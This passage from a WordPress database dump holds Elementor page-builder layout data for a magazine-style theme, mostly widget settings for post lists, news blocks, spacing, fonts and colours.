ight\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1193,436,'_elementor_version','0.4'),(1195,437,'_elementor_edit_mode','builder'),(1196,437,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blu